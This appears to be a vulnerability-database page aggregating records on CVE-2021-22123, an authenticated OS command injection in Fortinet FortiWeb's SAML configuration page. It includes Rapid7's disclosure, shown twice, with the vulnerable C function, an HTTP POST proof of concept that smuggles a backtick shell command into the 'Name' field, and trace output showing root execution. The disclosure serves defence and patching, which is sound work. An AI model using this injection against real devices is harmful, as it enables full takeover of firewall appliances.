DATABASE RESOURCES PRICING ABOUT US

{"id": "ED9550C1-0AFC-53DF-9BFA-AA6341B6E5AF", "vendorId": null, "type": "githubexploit", "bulletinFamily": "exploit", "title": "Exploit for OS Command Injection in Fortinet Fortiweb", "description": "<b>[CVE-2021-22123] Fortinet FortiWeb Authenticated OS Command I...", "published": "2021-08-18T10:54:27", "modified": "2021-12-14T10:02:19", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "COMPLETE", "baseScore": 9.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "href": "", "reporter": "", "references": [], "cvelist": ["CVE-2021-22123"], "immutableFields": [], "lastseen": "2021-12-14T18:17:26", "viewCount": 15, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-22123"]}, {"type": "fortinet", "idList": ["FG-IR-20-120", "FG-IR-21-116"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:9511625276530FB6A6D0D99D27559BAB"]}, {"type": "seebug", "idList": ["SSV:99335"]}, {"type": "thn", "idList": ["THN:FCBB400B24C7B24CD6B5136FA8BE38D3"]}, {"type": "threatpost", "idList": ["THREATPOST:BE0B5E93BD5FBBCB893FDDFE5348FDE9"]}], "rev": 4}, "score": {"value": 6.5, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-22123"]}, {"type": "fortinet", "idList": ["FG-IR-20-120", "FG-IR-21-116"]}, {"type": "kitploit", "idList": ["KITPLOIT:3449843613571411531"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:9511625276530FB6A6D0D99D27559BAB"]}, {"type": "seebug", "idList": ["SSV:99335"]}, {"type": "thn", "idList": ["THN:FCBB400B24C7B24CD6B5136FA8BE38D3"]}, {"type": "threatpost", "idList": ["THREATPOST:99DC4B497599503D640FDFD9A2DC5FA3", "THREATPOST:BE0B5E93BD5FBBCB893FDDFE5348FDE9"]}]}, "exploitation": null, "vulnersScore": 6.5}, "_state": {"dependencies": 1646162404}, "privateArea": 1}

{"fortinet": [{"lastseen": "2022-04-28T11:34:53", "description": "An OS command injection vulnerability in FortiWeb's management interface may allow a remote authenticated attacker to execute arbitrary commands on the system via the SAML server configuration page.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-01T00:00:00", "type": "fortinet", "title": "FortiWeb - OS command injection vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22123"], "modified": "2021-06-01T00:00:00", "id": "FG-IR-20-120", "href": "https://www.fortiguard.com/psirt/FG-IR-20-120", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-04-28T11:32:06", "description": "An OS command injection vulnerability in FortiWeb's management interface may allow a remote authenticated administrator to execute arbitrary commands on the system via the SAML server configuration page.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-18T00:00:00", "type": "fortinet", "title": "FortiWeb - OS command injection vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22123"], "modified": "2021-08-18T00:00:00", "id": "FG-IR-21-116", "href": "https://www.fortiguard.com/psirt/FG-IR-21-116", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T13:59:24", "description": "An OS command injection vulnerability in FortiWeb's management interface 6.3.7 and below, 6.2.3 and below, 6.1.x, 6.0.x, 5.9.x may allow a remote authenticated attacker to execute arbitrary commands on the system via the SAML server configuration page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-01T20:15:00", "type": "cve", "title": "CVE-2021-22123", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22123"], "modified": "2021-06-10T19:36:00", "cpe": [], "id": "CVE-2021-22123", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-22123", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": []}], "rapid7blog": [{"lastseen": "2021-08-17T15:14:31", "description": "\n\nAn OS command injection vulnerability in FortiWeb's management interface (version 6.3.11 and prior) can allow a remote, authenticated attacker to execute arbitrary commands on the system, via the SAML server configuration page. This is an instance of [ CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')](<https://cwe.mitre.org/data/definitions/78.html>) and has a CVSSv3 base score of [8.7](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N&version=3.1>). This vulnerability appears to be related to CVE-2021-22123, which was addressed in [FG-IR-20-120](<https://www.fortiguard.com/psirt/FG-IR-20-120>).\n\n## Product Description\n\nFortinet FortiWeb is a web application firewall (WAF), designed to catch both known and unknown exploits targeting the protected web applications before they have a chance to execute. More about FortiWeb can be found at [the vendor's website](<https://www.fortinet.com/products/web-application-firewall/fortiweb>).\n\n## Credit\n\nThis issue was discovered by researcher [William Vu](<https://twitter.com/wvuuuuuuuuuuuuu>) of Rapid7. It is being disclosed in accordance with Rapid7's [vulnerability disclosure policy](<https://www.rapid7.com/disclosure/>).\n\n## Exploitation\n\nAn attacker, who is first authenticated to the management interface of the FortiWeb device, can smuggle commands using backticks in the \"Name\" field of the SAML Server configuration page. These commands are then executed as the root user of the underlying operating system. The affected code is noted below:\n \n \n int move_metafile(char *path,char *name)\n {\n int iVar1;\n char buf [512];\n int nret;\n snprintf(buf,0x200,\"%s/%s\",\"/data/etc/saml/shibboleth/service_providers\",name);\n iVar1 = access(buf,0);\n if (iVar1 != 0) {\n snprintf(buf,0x200,\"mkdir %s/%s\",\"/data/etc/saml/shibboleth/service_providers\",name);\n iVar1 = system(buf);\n if (iVar1 != 0) {\n return iVar1;\n }\n }\n snprintf(buf,0x200,\"cp %s %s/%s/%s.%s\",path,\"/data/etc/saml/shibboleth/service_providers\",name,\n \"Metadata\",&DAT_00212758);\n iVar1 = system(buf);\n return iVar1;\n }\n \n\nThe HTTP POST request and response below demonstrates an example exploit of this vulnerability:\n \n \n POST /api/v2.0/user/remoteserver.saml HTTP/1.1\n Host: [redacted]\n Cookie: [redacted]\n User-Agent: [redacted]\n Accept: application/json, text/plain, */*\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Referer: https://[redacted]/root/user/remote-user/saml-user/\n X-Csrftoken: 814940160\n Content-Type: multipart/form-data; boundary=---------------------------94351131111899571381631694412\n Content-Length: 3068\n Origin: https://[redacted]\n Dnt: 1\n Te: trailers\n Connection: close\n -----------------------------94351131111899571381631694412\n Content-Disposition: form-data; name=\"q_type\"\n 1\n -----------------------------94351131111899571381631694412\n Content-Disposition: form-data; name=\"name\"\n `touch /tmp/vulnerable`\n -----------------------------94351131111899571381631694412\n Content-Disposition: form-data; name=\"entityID\"\n test\n -----------------------------94351131111899571381631694412\n Content-Disposition: form-data; name=\"service-path\"\n /saml.sso\n -----------------------------94351131111899571381631694412\n Content-Disposition: form-data; name=\"session-lifetime\"\n 8\n -----------------------------94351131111899571381631694412\n Content-Disposition: form-data; name=\"session-timeout\"\n 30\n -----------------------------94351131111899571381631694412\n Content-Disposition: form-data; name=\"sso-bind\"\n post\n -----------------------------94351131111899571381631694412\n Content-Disposition: form-data; name=\"sso-bind_val\"\n 1\n -----------------------------94351131111899571381631694412\n Content-Disposition: form-data; name=\"sso-path\"\n /SAML2/POST\n -----------------------------94351131111899571381631694412\n Content-Disposition: form-data; name=\"slo-bind\"\n post\n -----------------------------94351131111899571381631694412\n Content-Disposition: form-data; name=\"slo-bind_val\"\n 1\n -----------------------------94351131111899571381631694412\n Content-Disposition: form-data; name=\"slo-path\"\n /SLO/POST\n -----------------------------94351131111899571381631694412\n Content-Disposition: form-data; name=\"flag\"\n 0\n -----------------------------94351131111899571381631694412\n Content-Disposition: form-data; name=\"enforce-signing\"\n disable\n -----------------------------94351131111899571381631694412\n Content-Disposition: form-data; name=\"enforce-signing_val\"\n 0\n -----------------------------94351131111899571381631694412\n Content-Disposition: form-data; name=\"metafile\"; filename=\"test.xml\"\n Content-Type: text/xml\n <?xml version=\"1.0\"?>\n <md:EntityDescriptor xmlns:md=\"urn:oasis:names:tc:SAML:2.0:metadata\" validUntil=\"2021-06-12T16:54:31Z\" cacheDuration=\"PT1623948871S\" entityID=\"test\">\n <md:IDPSSODescriptor WantAuthnRequestsSigned=\"false\" protocolSupportEnumeration=\"urn:oasis:names:tc:SAML:2.0:protocol\">\n <md:KeyDescriptor use=\"signing\">\n <ds:KeyInfo xmlns:ds=\"http://www.w3.org/2000/09/xmldsig#\">\n <ds:X509Data>\n <ds:X509Certificate>test</ds:X509Certificate>\n </ds:X509Data>\n </ds:KeyInfo>\n </md:KeyDescriptor>\n <md:KeyDescriptor use=\"encryption\">\n <ds:KeyInfo xmlns:ds=\"http://www.w3.org/2000/09/xmldsig#\">\n <ds:X509Data>\n <ds:X509Certificate>test</ds:X509Certificate>\n </ds:X509Data>\n </ds:KeyInfo>\n </md:KeyDescriptor>\n <md:NameIDFormat>urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified</md:NameIDFormat>\n <md:SingleSignOnService Binding=\"urn:oasis:names:tc:SAML:2.0:bindings:HTTP-Redirect\" Location=\"test\"/>\n </md:IDPSSODescriptor>\n </md:EntityDescriptor>\n -----------------------------94351131111899571381631694412--\n HTTP/1.1 500 Internal Server Error\n Date: Thu, 10 Jun 2021 11:59:45 GMT\n Cache-Control: no-cache, no-store, must-revalidate\n Pragma: no-cache\n Set-Cookie: [redacted]\n X-Frame-Options: SAMEORIGIN\n X-XSS-Protection: 1; mode=block\n Content-Security-Policy: frame-ancestors 'self'\n X-Content-Type-Options: nosniff\n Content-Length: 20\n Strict-Transport-Security: max-age=63072000\n Connection: close\n Content-Type: application/json\n {\"errcode\": \"-651\"}\n \n\nNote the smuggled 'touch' command is concatenated in the mkdir shell command:\n \n \n [pid 12867] execve(\"/migadmin/cgi-bin/fwbcgi\", [\"/migadmin/cgi-bin/fwbcgi\"], 0x55bb0395bf00 /* 42 vars */) = 0\n [pid 13934] execve(\"/bin/sh\", [\"sh\", \"-c\", \"mkdir /data/etc/saml/shibboleth/service_providers/`touch /tmp/vulnerable`\"], 0x7fff56b1c608 /* 42 vars */) = 0\n [pid 13935] execve(\"/bin/touch\", [\"touch\", \"/tmp/vulnerable\"], 0x55774aa30bf8 /* 44 vars */) = 0\n [pid 13936] execve(\"/bin/mkdir\", [\"mkdir\", \"/data/etc/saml/shibboleth/service_providers/\"], 0x55774aa30be8 /* 44 vars */) = 0\n \n\nFinally, the results of the 'touch' command can be seen on the local command line of the FortiWeb device:\n \n \n /# ls -l /tmp/vulnerable\n -rw-r--r-- 1 root 0 0 Jun 10 11:59 /tmp/vulnerable\n /#\n \n\n## Impact\n\nAn attacker can leverage this vulnerability to take complete control of the affected device, with the highest possible privileges. They might install a persistent shell, crypto mining software, or other malicious software. In the unlikely event the management interface is exposed to the internet, they could use the compromised platform to reach into the affected network beyond the DMZ. Note, though, Rapid7 researchers were only able to identify less than three hundred total of these devices that appear to be exposing their management interfaces to the general internet.\n\nNote that while authentication is a prerequisite for this exploit, this vulnerability could be combined with another authentication bypass issue, such as [CVE-2020-29015](<https://attackerkb.com/topics/n8OdPI11Nx/cve-2020-29015>).\n\n## Remediation\n\nIn the absence of a patch, users are advised to disable the FortiWeb device's management interface from untrusted networks, which would include the internet. Generally speaking, management interfaces for devices like FortiWeb should not be exposed directly to the internet anyway \u2014 instead, they should be reachable only via trusted, internal networks, or over a secure VPN connection.\n\n## Disclosure Timeline\n\n * June, 2021: Issue discovered and validated by William Vu of Rapid7\n * Thu, Jun 10, 2021: Initial disclosure to the vendor via their [PSIRT Contact Form](<https://www.fortiguard.com/faq/psirt-contact>)\n * Fri, Jun 11, 2021: Acknowledged by the vendor (ticket 132097)\n * Wed, Aug 11, 2021: Follow up with the vendor\n * Tue, Aug 17, 2021: Public disclosure via [this post](<https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection/>)\n * Tue, Aug 17, 2021: Vendor indicated that Fortiweb 6.4.1 is expected to include a fix, and will be released at the end of August\n\n \n\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-17T13:58:19", "type": "rapid7blog", "title": "Fortinet FortiWeb OS Command Injection", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-29015", "CVE-2021-22123"], "modified": "2021-08-17T13:58:19", "id": "RAPID7BLOG:9511625276530FB6A6D0D99D27559BAB", "href": "https://blog.rapid7.com/2021/08/17/fortinet-fortiweb-os-command-injection/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2021-08-20T03:36:27", "description": "# Fortinet FortiWeb OS Command Injection\n\n * Aug 17, 2021\n\n * 5 min read\n\n \n\nAn OS command injection vulnerability in FortiWeb's management interface\n(version 6.3.11 and prior) can allow a remote, authenticated attacker to\nexecute arbitrary commands on the system, via the SAML server configuration\npage. This is an instance of [ CWE-78: Improper Neutralization of Special\nElements used in an OS Command ('OS Command\nInjection')](https://cwe.mitre.org/data/definitions/78.html) and has a CVSSv3\nbase score of [8.7](https://nvd.nist.gov/vuln-\nmetrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N&version=3.1).\nThis vulnerability appears to be related to CVE-2021-22123, which was\naddressed in [FG-IR-20-120](https://www.fortiguard.com/psirt/FG-IR-20-120).\n\n## Product Description\n\nFortinet FortiWeb is a web application firewall (WAF), designed to catch both\nknown and unknown exploits targeting the protected web applications before\nthey have a chance to execute. More about FortiWeb can be found at [the\nvendor's website](https://www.fortinet.com/products/web-application-\nfirewall/fortiweb).\n\n## Credit\n\nThis issue was discovered by researcher [William\nVu](https://twitter.com/wvuuuuuuuuuuuuu) of Rapid7. It is being disclosed in\naccordance with Rapid7's [vulnerability disclosure\npolicy](https://www.rapid7.com/disclosure/).\n\n## Exploitation\n\nAn attacker, who is first authenticated to the management interface of the\nFortiWeb device, can smuggle commands using backticks in the \"Name\" field of\nthe SAML Server configuration page. These commands are then executed as the\nroot user of the underlying operating system. The affected code is noted\nbelow:\n\n```\nint move_metafile(char *path,char *name)\n{\nint iVar1;\nchar buf [512];\nint nret;\nsnprintf(buf,0x200,\"%s/%s\",\"/data/etc/saml/shibboleth/service_providers\",name);\niVar1 = access(buf,0);\nif (iVar1 != 0) {\nsnprintf(buf,0x200,\"mkdir %s/%s\",\"/data/etc/saml/shibboleth/service_providers\",name);\niVar1 = system(buf);\nif (iVar1 != 0) {\nreturn iVar1;\n}\n}\nsnprintf(buf,0x200,\"cp %s %s/%s/%s.%s\",path,\"/data/etc/saml/shibboleth/service_providers\",name,\n\"Metadata\",&DAT_00212758);\niVar1 = system(buf);\nreturn iVar1;\n}\n```\n\n\n\nThe HTTP POST request and response below demonstrates an example exploit of this vulnerability:\n\n ```\nPOST /api/v2.0/user/remoteserver.saml HTTP/1.1\nHost: [redacted]\nCookie: [redacted]\nUser-Agent: [redacted]\nAccept: application/json, text/plain, */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://[redacted]/root/user/remote-user/saml-user/\nX-Csrftoken: 814940160\nContent-Type: multipart/form-data; boundary=---------------------------94351131111899571381631694412\nContent-Length: 3068\nOrigin: https://[redacted]\nDnt: 1\nTe: trailers\nConnection: close\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"q_type\"\n1\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"name\"\n`touch /tmp/vulnerable`\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"entityID\"\ntest\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"service-path\"\n/saml.sso\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"session-lifetime\"\n8\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"session-timeout\"\n30\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"sso-bind\"\npost\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"sso-bind_val\"\n1\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"sso-path\"\n/SAML2/POST\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"slo-bind\"\npost\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"slo-bind_val\"\n1\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"slo-path\"\n/SLO/POST\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"flag\"\n0\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"enforce-signing\"\ndisable\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"enforce-signing_val\"\n0\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"metafile\"; filename=\"test.xml\"\nContent-Type: text/xml\n<?xml version=\"1.0\"?>\n<md:EntityDescriptor xmlns:md=\"urn:oasis:names:tc:SAML:2.0:metadata\" validUntil=\"2021-06-12T16:54:31Z\" cacheDuration=\"PT1623948871S\" entityID=\"test\">\n<md:IDPSSODescriptor WantAuthnRequestsSigned=\"false\" protocolSupportEnumeration=\"urn:oasis:names:tc:SAML:2.0:protocol\">\n<md:KeyDescriptor use=\"signing\">\n<ds:KeyInfo xmlns:ds=\"http://www.w3.org/2000/09/xmldsig#\">\n<ds:X509Data>\n<ds:X509Certificate>test</ds:X509Certificate>\n</ds:X509Data>\n</ds:KeyInfo>\n</md:KeyDescriptor>\n<md:KeyDescriptor use=\"encryption\">\n<ds:KeyInfo xmlns:ds=\"http://www.w3.org/2000/09/xmldsig#\">\n<ds:X509Data>\n<ds:X509Certificate>test</ds:X509Certificate>\n</ds:X509Data>\n</ds:KeyInfo>\n</md:KeyDescriptor>\n<md:NameIDFormat>urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified</md:NameIDFormat>\n<md:SingleSignOnService Binding=\"urn:oasis:names:tc:SAML:2.0:bindings:HTTP-Redirect\" Location=\"test\"/>\n</md:IDPSSODescriptor>\n</md:EntityDescriptor>\n-----------------------------94351131111899571381631694412--\nHTTP/1.1 500 Internal Server Error\nDate: Thu, 10 Jun 2021 11:59:45 GMT\nCache-Control: no-cache, no-store, must-revalidate\nPragma: no-cache\nSet-Cookie: [redacted]\nX-Frame-Options: SAMEORIGIN\nX-XSS-Protection: 1; mode=block\nContent-Security-Policy: frame-ancestors 'self'\nX-Content-Type-Options: nosniff\nContent-Length: 20\nStrict-Transport-Security: max-age=63072000\nConnection: close\nContent-Type: application/json\n{\"errcode\": \"-651\"}\n ```\n\n\n\n\nNote the smuggled 'touch' command is concatenated in the mkdir shell command:\n\n```\n[pid 12867] execve(\"/migadmin/cgi-bin/fwbcgi\", [\"/migadmin/cgi-bin/fwbcgi\"], 0x55bb0395bf00 /* 42 vars */) = 0\n[pid 13934] execve(\"/bin/sh\", [\"sh\", \"-c\", \"mkdir /data/etc/saml/shibboleth/service_providers/`touch /tmp/vulnerable`\"], 0x7fff56b1c608 /* 42 vars */) = 0\n[pid 13935] execve(\"/bin/touch\", [\"touch\", \"/tmp/vulnerable\"], 0x55774aa30bf8 /* 44 vars */) = 0\n[pid 13936] execve(\"/bin/mkdir\", [\"mkdir\", \"/data/etc/saml/shibboleth/service_providers/\"], 0x55774aa30be8 /* 44 vars */) = 0\n```\n\n\n\n\nFinally, the results of the 'touch' command can be seen on the local command\nline of the FortiWeb device:\n\n```\n/# ls -l /tmp/vulnerable\n-rw-r--r-- 1 root 0 0 Jun 10 11:59 /tmp/vulnerable\n/#\n```\n\n\n\n\n## Impact\n\nAn attacker can leverage this vulnerability to take complete control of the\naffected device, with the highest possible privileges. They might install a\npersistent shell, crypto mining software, or other malicious software. In the\nunlikely event the management interface is exposed to the internet, they could\nuse the compromised platform to reach into the affected network beyond the\nDMZ. Note, though, Rapid7 researchers were only able to identify less than\nthree hundred total of these devices that appear to be exposing their\nmanagement interfaces to the general internet.\n\nNote that while authentication is a prerequisite for this exploit, this\nvulnerability could be combined with another authentication bypass issue, such\nas [CVE-2020-29015](https://attackerkb.com/topics/n8OdPI11Nx/cve-2020-29015).\n\n## Remediation\n\nIn the absence of a patch, users are advised to disable the FortiWeb device's\nmanagement interface from untrusted networks, which would include the\ninternet. Generally speaking, management interfaces for devices like FortiWeb\nshould not be exposed directly to the internet anyway -- instead, they should\nbe reachable only via trusted, internal networks, or over a secure VPN\nconnection.\n\n## Disclosure Timeline\n\n * June, 2021: Issue discovered and validated by William Vu of Rapid7\n * Thu, Jun 10, 2021: Initial disclosure to the vendor via their [PSIRT Contact Form](https://www.fortiguard.com/faq/psirt-contact)\n * Fri, Jun 11, 2021: Acknowledged by the vendor (ticket 132097)\n * Wed, Aug 11, 2021: Follow up with the vendor\n * Tue, Aug 17, 2021: Public disclosure via [this post](https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection/)\n * Tue, Aug 17, 2021: Vendor indicated that Fortiweb 6.4.1 is expected to include a fix, and will be released at the end of August", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-19T00:00:00", "type": "seebug", "title": "Fortinet FortiWeb \u6388\u6743\u547d\u4ee4\u6ce8\u5165\u6f0f\u6d1e\uff08CVE-2021-22123\uff09", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-29015", "CVE-2021-22123"], "modified": "2021-08-19T00:00:00", "id": "SSV:99335", "href": "https://www.seebug.org/vuldb/ssvid-99335", "sourceData": "", "sourceHref": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-08-18T20:47:20", "description": "UPDATE\n\nAn unpatched OS command-injection security vulnerability has been disclosed in Fortinet\u2019s web application firewall (WAF) platform, known as FortiWeb. It could allow privilege escalation and full device takeover, researchers said.\n\nFortiWeb is a cybersecurity defense platform, [aimed at](<https://www.fortinet.com/products/web-application-firewall/fortiweb>) protecting business-critical web applications from attacks that target known and unknown vulnerabilities. The firewall has been to keep up with the deployment of new or updated features, or the addition of new web APIs, according to Fortinet.\n\nThe bug (CVE pending) exists in FortiWeb\u2019s management interface (version 6.3.11 and prior), and carries a CVSSv3 base score of 8.7 out of 10, making it high-severity. It can allow a remote, authenticated attacker to execute arbitrary commands on the system, via the SAML server configuration page, according to Rapid7 researcher William Vu who discovered the bug.\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\n\u201cNote that while authentication is a prerequisite for this exploit, this vulnerability could be combined with another authentication-bypass issue, such as [CVE-2020-29015](<https://www.fortiguard.com/psirt/FG-IR-20-124>),\u201d according to a [Tuesday writeup](<https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection/>) on the issue.\n\nOnce attackers are authenticated to the management interface of the FortiWeb device, they can smuggle commands using backticks in the \u201cName\u201d field of the SAML Server configuration page. These commands are then executed as the root user of the underlying operating system.\n\n\u201cAn attacker can leverage this vulnerability to take complete control of the affected device, with the highest possible privileges,\u201d according to the writeup. \u201cThey might install a persistent shell, crypto mining software, or other malicious software.\u201d\n\nThe damage could be worse if the management interface is exposed to the internet: Rapid7 noted that attackers could pivot to the wider network in that case. However, Rapid7 researchers identified less than three hundred appliances that appeared to be doing so.\n\nIn the analysis, Vu provided a proof-of-concept exploit code, which uses an HTTP POST request and response.\n\nIn light of the disclosure, Fortinet has sped up plans to release a fix for the problem with FortiWeb 6.4.1 \u2014 originally planned for the end of August, it will now be available by the end of the week.\n\n\u201cWe are working to deliver immediate notification of a workaround to customers and a patch released by the end of the week,\u201d it said in a statement provided to Threatpost.\n\nThe firm also noted that Rapid7\u2019s disclosure was a bit of a surprise given [vulnerability-disclosure norms](<https://threatpost.com/giggle-managing-expectations-vulnerability-disclosure/159039/>) in the 